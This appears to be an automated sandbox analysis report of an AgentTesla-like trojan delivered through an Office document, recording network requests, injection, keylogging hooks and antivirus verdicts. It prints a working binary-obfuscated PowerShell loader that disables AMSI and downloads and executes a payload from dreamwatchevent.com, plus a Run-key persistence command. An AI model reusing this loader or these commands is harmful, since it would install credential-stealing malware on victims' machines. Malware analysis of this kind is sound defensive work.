Data received	34%46%30%31%46%35%31%36%42%45%39%36%34%34%31%45%37%41%38%43%32%45%33%46%37%35%32%44%46%42%38%37%41%37%31%38%34%45%31%33%36%35%41%32%35%37%39%33%31%44%34%31%34%36%44%43%34%37%39%44%41%30%31%30%37%38%33%45%37%33%37%41%35%37%37%43%44%42%32%35%34%34%38%43%33%42%45%36%39%45%36%45%44%45%32%32%37%41%34%44%30%35%34%46%33%44%44%34%31%30%44%34%38%39%33%41%39%41%34%31%39%35%45%33%30%45%43%46%37%34%36%39%30%31%44%35%44%33%31%36%37%42%46%39%44%41%34%36%36%41%46%42%41%44%30%44%39%34%31%39%34%38%43%31%32%30%33%38%46%45%42%37%35%37%39%41%37%36%46%38%35%39%30%37%39%45%41%45%45%36%44%45%46%38%46%43%41%37%30%35%46%35%39%33%41%31%32%31%33%31%35%30%45%45%39%41%37%36%35%38%33%32%30%41%42%44%38%39%44%43%42%35%38%30%37%42%37%41%42%32%36%41%38%36%30%31%45%36%45%31%41%31%38%44%46%31%30%34%32%38%41%42%35%38%41%45%46%45%35%39%42%32%33%32%38%39%45%31%45%39%44%38%45%45%45%34%45%34%42%39%32%35%39%46%37%42%43%41%32%44%44%46%32%42%37%31%32%36%33%35%41%43%36%37%32%44%44%42%32%33%39%42%44%43%38%42%44%38%45%35%30%39%32%31%41%38%36%39%30%37%30%44%37%36%39%34%44%34%44%35%46%35%46%44%38%42%33%32%37%41%33%31%33%45%42%37%46%43%34%37%42%41%36%31%34%45%37%35%31%41%46%43%35%32%41%37%35%41%46%31%35%39%42%46%41%32%44%35%37%41%31%31%30%43%36%46%36%45%44%33%42%38%31%44%42%43%35%37%31%35%34%35%43%32%32%33%38%43%39%45%37%39%31%42%41%45%35%39%31%39%37%39%30%39%46%44%43%30%32%39%34%44%44%36%38%31%39%33%31%38%46%41%45%34%39%45%44%32%36%34%30%41%42%42%36%30%34%33%30%46%39%42%34%35%35%44%33%35%38%41%42%43%38%33%32%30%43%32%46%33%41%2D%2D%43%34%36%33%33%43%35%36%39%39%37%35%44%45%43%33%41%46%41%42%39%33%30%43%41%30%34%32%31%34%43%31%46%42%33%39%34%41%42%31%36%41%39%33%41%38%41%44%39%30%37%42%37%31%42%36%42%36%39%43%37%41%39%35%36%31%46%38%46%34%34%39%33%30%36%46%41%36%37%41%41%41%39%44%43%32%31%32%37%43%46%38%45%30%34%35%37%33%46%34%36%39%41%44%43%42%39%31%42%45%45%42%38%38%36%37%35%31%34%37%36%37%35%39%37%36%43%32%31%46%37%30%33%37%39%39%36%45%32%31%35%32%39%35%37%34%32%30%42%31%41%38%44%34%43%45%39%37%39%33%45%45%30%33%45%30%31%42%43%33%34%31%32%41%36%38%42%46%31%45%43%43%38%31%42%44%37%41%46%37%32%38%36%32%36%33%34%46%41%39%43%42%39%43%45%39%43%33%36%37%43%38%37%34%45%30%36%34%39%34%39%43%43%30%39%34%42%30%41%39%38%36%30%34%35%30%46%44%42%35%44%41%37%33%45%45%33%34%32%34%34%37%42%44%38%45%42%38%33%37%37%41%46%42%34%46%46%38%39%43%45%37%30%46%37%34%31%36%37%42%46%34%38%42%30%43%35%31%30%43%39%41%42%33%45%44%45%46%31%35%43%30%43%34%46%33%43%32%41%42%45%36%41%37%43%34%33%32%43%39%32%30%38%46%37%37%31%31%39%46%35%46%35%35%43%43%33%36%32%44%43%39%33%39%31%30%37%43%36%2D%2D%32%34%37%44%43%32%43%42%33%34%46%34%31%44%36%37%46%33%37%45%45%42%35%31%35%31%30%33%33%45%39%37%35%39%35%36%39%38%44%39%42%32%42%44%46%31%33%43%44%34%42%42%39%30%38%33%36%39%38%34%32%37%32%38%32%33%35%31%37%38%36%36%44%44%32%42%38%39%45%36%34%39%32%34%36%42%36%43%32%45%39%41%33%37%46%41%37%36%43%45%30%31%35%32%39%37%31%44%42%39%30%38%37%44%34%44%38%43%43%36%41%44%45%45%34%32%42%43%33%43%31%41%46%43%41%36%30%34%43%32%33%45%32%34%36%44%34%34%39%37%43%37%33%46%37%41%36%43%38%43%34%42%35%34%44%41%37%42%33%31%46%32%30%34%34%35%39%33%45%43%44%38%46%38%45%33%34%32%46%45%45%46%34%43%32%33%45%43%38%39%38%31%39%36%33%44%45%45%45%41%39%35%39%44%41%33%44%45%33%46%33%39%35%32%30%32%46%32%33%35%36%35%2D%2D%39%45%44%30%36%32%39%30%38%39%42%46%34%42%41%30%36%34%31%41%34%34%33%34%45%34%32%36%39%35%35%42%32%37%39%39%46%39%36%35%45%41%44%38%32%39%38%35%32%45%32%38%35%36%37%36%37%34%34%39%44%44%39%36%34%41%45%42%37%4
Data received	6%31%38%35%36%41%37%31%34%36%38%45%45%35%36%38%45%38%33%33%36%41%30%31%33%30%46%33%42%46%36%30%31%42%38%34%38%46%31%32%31%38%32%30%41%43%46%33%38%45%39%42%41%45%30%38%38%42%42%44%46%38%38%30%34%32%37%45%42%36%32%33%32%45%33%30%39%33%36%43%43%36%44%44%41%41%37%41%38%39%45%38%43%32%46%46%35%37%33%46%36%37%36%37%37%45%35%32%38%34%35%33%32%33%43%35%35%45%42%34%37%44%38%41%37%38%46%42%34%42%33%36%36%45%35%31%46%35%36%31%34%33%37%44%45%37%36%43%45%31%38%31%38%34%38%30%45%42%31%35%41%35%34%32%43%42%46%39%31%41%37%38%30%43%37%44%38%42%36%42%45%32%36%36%41%39%33%41%33%39%32%33%32%33%37%33%30%45%44%31%45%39%42%31%46%36%33%41%39%32%36%36%37%41%42%35%36%34%44%41%37%43%39%30%31%35%36%42%33%45%31%31%34%44%46%32%31%30%36%37%39%39%30%42%37%37%44%37%43%44%35%36%30%41%32%35%43%35%32%45%33%37%43%43%44%33%44%41%37%30%41%37%35%44%31%33%39%44%43%31%41%37%45%34%46%36%41%44%46%37%35%35%31%42%37%46%41%45%44%42%42%43%44%
Data received	2D%45%32%38%30%38%46%45%32%38%30%41%42%45%32%38%31%41%46%45%32%38%31%41%41%45%32%38%30%38%43%45%32%38%31%41%46%45%32%38%30%38%46%45%32%38%30%38%44%45%32%38%31%41%42%45%32%38%30%41%44%45%32%38%31%41%46%45%32%38%31%41%43%45%32%38%31%41%44%45%32%38%30%38%46%45%32%38%30%41%43%45%32%38%30%38%44%45%32%38%31%41%45%45%32%38%30%38%44%45%32%38%31%41%43%45%32%38%30%38%43%45%32%38%31%41%46%45%32%38%31%41%42%45%32%38%31%41%44%45%32%38%31%41%46%45%32%38%31%41%43%45%32%38%31%41%45%45%32%38%30%38%45%45%32%38%31%41%43%45%32%38%31%41%42%45%32%38%30%41%43%45%32%38%31%41%43%45%32%38%30%38%42%45%32%38%30%38%45%45%32%38%31%41%45%45%32%38%30%38%45%45%32%38%30%38%44%45%32%38%31%41%41%45%32%38%30%41%44%45%32%38%30%41%45%45%32%38%30%38%46%45%32%38%30%41%45%2D%2D%45%32%38%31%41%46%45%32%38%31%41%43%45%32%38%30%38%46%45%32%38%30%38%44%45%32%38%30%41%42%45%32%38%30%41%44%45%32%38%31%41%42%45%32%38%30%38%45%45%32%38%31%41%45%45%32%38%31%41%43%45%32%38%31%41%45%45%32%38%30%41%43%45%32%38%30%41%41%45%32%38%31%41%44%45%32%38%31%41%42%45%32%38%30%41%44%45%32%38%30%38%45%45%32%38%30%41%43%45%32%38%30%38%46%45%32%38%30%38%44%45%32%38%31%41%44%45%32%38%30%41%44%45%32%38%31%41%45%45%32%38%31%41%44%45%32%38%30%41%42%45%32%38%31%41%46%45%32%38%31%41%44%45%32%38%30%41%41%45%32%38%30%38%46%45%32%38%30%41%42%45%32%38%30%38%44%45%32%38%31%41%41%45%32%38%31%41%44%45%32%38%30%41%42%45%32%38%30%38%46%45%32%38%30%38%42%45%32%38%30%41%41%45%32%38%30%38%45%45%32%38%30%38%45%45%32%38%31%41%46%45%32%38%30%41%45%2D%2D%45%32%38%30%38%43%45%32%38%30%38%42%45%32%38%30%41%44%45%32%38%31%41%41%45%32%38%30%41%42%45%32%38%30%41%42%45%32%38%30%41%41%45%32%38%30%38%42%45%32%38%31%41%43%45%32%38%30%41%45%45%32%38%30%38%42%45%32%38%30%38%42%45%32%38%30%41%43%45%32%38%30%38%42%45%32%38%31%41%42%45%32%38%30%41%41%45%32%38%31%41%46%45%32%38%31%41%42%45%32%38%30%38%42%45%32%38%31%41%44%45%32%38%30%41%41%45%32%38%31%41%43%45%32%38%30%41%43%45%32%38%30%38%42%45%32%38%30%38%42%45%32%38%30%38%45%45%32%38%30%41%44%45%32%38%30%38%43%45%32%38%30%41%45%45%32%38%30%38%43%45%32%38%30%41%41%45%32%38%31%41%45%45%32%38%31%41%42%45%32%38%30%38%42%45%32%38%30%41%45%45%32%38%30%38%45%45%32%38%31%41%46%45%32%38%30%38%42%45%32%38%30%41%45%45%32%38%30%41%43%45%32%38%30%41%45%2D%2D%45%32%38%31%41%46%45%32%38%30%38%46%45%32%38%31%41%44%45%32%38%30%38%46%45%32%38%31%41%41%45%32%38%30%38%46%45%32%38%31%41%44%45%32%38%31%41%44%45%32%38%30%38%45%45%32%38%31%41%43%45%32%38%31%41%46%45%32%38%31%41%41%45%32%38%31%41%43%45%32%38%30%41%41%45%32%38%30%38%44%45%32%38%31%41%44%45%32%38%30%41%42%45%32%38%31%41%42%45%32%38%30%38%45%45%32%38%31%41%44%45%32%38%30%38%42%45%32%38%31%41%45%45%32%38%30%41%42%45%32%38%30%38%45%45%32%38%30%38%43%45%32%38%31%41%42%45%32%38%30%41%45%45%32%38%30%38%45%45%32%38%30%41%44%45%32%38%30%38%43%45%32%38%30%41%44%45%32%38%30%38%45%45%32%38%30%41%43%45%32%38%30%41%41%45%32%38%30%41%41%45%32%38%30%41%42%45%32%38%31%41%42%45%32%38%31%41%46%4
Data received	%42%31%30%43%41%45%38%34%34%33%43%39%37%39%46%41%41%41%41%34%45%45%35%34%30%39%39%31%44%31%36%38%41%39%39%43%45%42%37%31%45%43%44%37%45%44%42%31%41%33%45%34%39%41%31%32%39%43%41%42%31%44%32%43%33%34%42%44%44%31%43%31%45%31%36%34%45%45%41%35%37%31%38%46%44%43%34%46%36%31%35%44%45%33%42%42%30%42%30%39%33%46%44%37%30%39%42%41%41%34%32%33%45%45%34%32%33%36%30%32%39%38%43%33%32%46%36%35%42%39%32%34%45%44%36%33%32%32%30%37%31%37%43%32%38%42%31%46%32%2D%2D%32%32%38%37%42%37%46%43%46%44%39%31%43%33%30%39%41%35%35%42%31%31%41%44%42%32%44%38%38%45%37%38%32%31%45%44%42%32%46%37%34%36%37%34%39%32%42%38%39%31%39%46%37%32%44%44%32%46%45%32%46%34%32%36%46%33%45%39%39%35%34%35%41%42%44%34%39%30%32%30%31%37%42%31%45%30%37%31%43%32%31%30%46%35%33%46%42%32%31%32%45%35%43%34%35%31%43%46%36%41%36%37%34%37%37%41%35%30%44%46%31%39%46%37%46%34%38%35%46%35%42%30%41%37%39%35%31%41%33%34%33%33%43%33%32%45%34%32%43%36%42%41%43%41%36%33%44%38%38%32%39%34%46%46%42%35%30%35%36%42%35%45%45%34%32%44%37%38%38%43%35%41%38%30%36%46%36%36%46%45%41%46%35%41%46%30%43%32%44%36%35%45%41%44%30%35%43%42%44%36%37%33%37%34%39%42%34%44%44%34%43%45%32%35%35%38%39%35%32%39%42%44%42%36%36%41%35%42%36%42%44%41%33%39%36%31%30%36%44%45%44%37%43%37%42%41%38%35%41%41%37%30%42%37%36%43%39%34%36%41%34%43%39%39%44%33%44%33%42%45%31%30%33%42%31%36%31%35%32%38%33%35%30%46%45%38%46%41%38%36%44%30%42%32%37%33%35%38%45%34%41%32%41%44%44%35%35%36%39%44%37%39%46%38%42%42%42%34%34%42%43%32%30%43%42%4
Data received	E%65%78%65%27%27%2C%24%6F%72%42%6F%32%29%27%7C%49%45%58

Poweshell is sending data to a remote host (2 events)

Data sent	GET /.well-known/pki-validation/Protected%20Client.js HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive
Data sent	GET /.well-known/pki-validation/Attack.jpg HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 10, 2021, 8:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 10, 2021, 8:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 54 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Take ScreenShot	rule	ScreenShot
description	browser info stealer	rule	infoStealer_browser_Zero
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
cmdline	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
cmdline	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 10, 2021, 8:59 a.m.	process_identifier: 212 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004b8	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lol

reg_value

C:\Users\test22\AppData\Roaming\notepad.js

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\notepad.js

A potential heapspray has been detected. 165 megabytes was sprayed onto the heap of the powershell.exe process (2 events)

count

1843

name

heapspray

process

powershell.exe

total_mb

115

length

65536

protection

PAGE_READWRITE

count

675

name

heapspray

process

powershell.exe

total_mb

length

77824

protection

PAGE_READWRITE

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x0046e000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 212 process_handle: 0x000004b8	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 212 process_handle: 0x000004b8	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExA Sept. 10, 2021, 8:59 a.m.	thread_identifier: 0 callback_function: 0x004088ca hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00400000	1	524879	0

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

MicroWorld-eScan	VB:Trojan.Valyria.5189
FireEye	VB:Trojan.Valyria.5189
ALYac	VB:Trojan.Valyria.5189
Cyren	X97M/Agent.ACH.gen!Eldorado
TrendMicro-HouseCall	Trojan.XF.DLOADR.AI
Kaspersky	HEUR:Trojan.MSOffice.SAgent.gen
BitDefender	VB:Trojan.Valyria.5189
Ad-Aware	VB:Trojan.Valyria.5189
TrendMicro	Trojan.XF.DLOADR.AI
McAfee-GW-Edition	Artemis
Emsisoft	VB:Trojan.Valyria.5189 (B)
Avira	X97M/Agent.0946111
GData	VB:Trojan.Valyria.5189
Cynet	Malicious (score: 99)
MAX	malware (ai score=85)
Fortinet	VBA/Agent.MIP!tr

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Sept. 10, 2021, 8:58 a.m.	buffer: GET /.well-known/pki-validation/Protected%20Client.js HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive socket: 1284 sent: 117	1	117	0
send Sept. 10, 2021, 8:58 a.m.	buffer: GET /.well-known/pki-validation/Attack.jpg HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive socket: 1452 sent: 106	1	106	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2180 called NtSetContextThread to modify thread in remote process 212
NtSetContextThread Sept. 10, 2021, 8:59 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000568 process_identifier: 212	1	0	0

Powershell script adds registry entries (1 event)

cmd

"c:\windows\system32\windowspowershell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };i`e`x([system.string]::join('', $gf))powershell 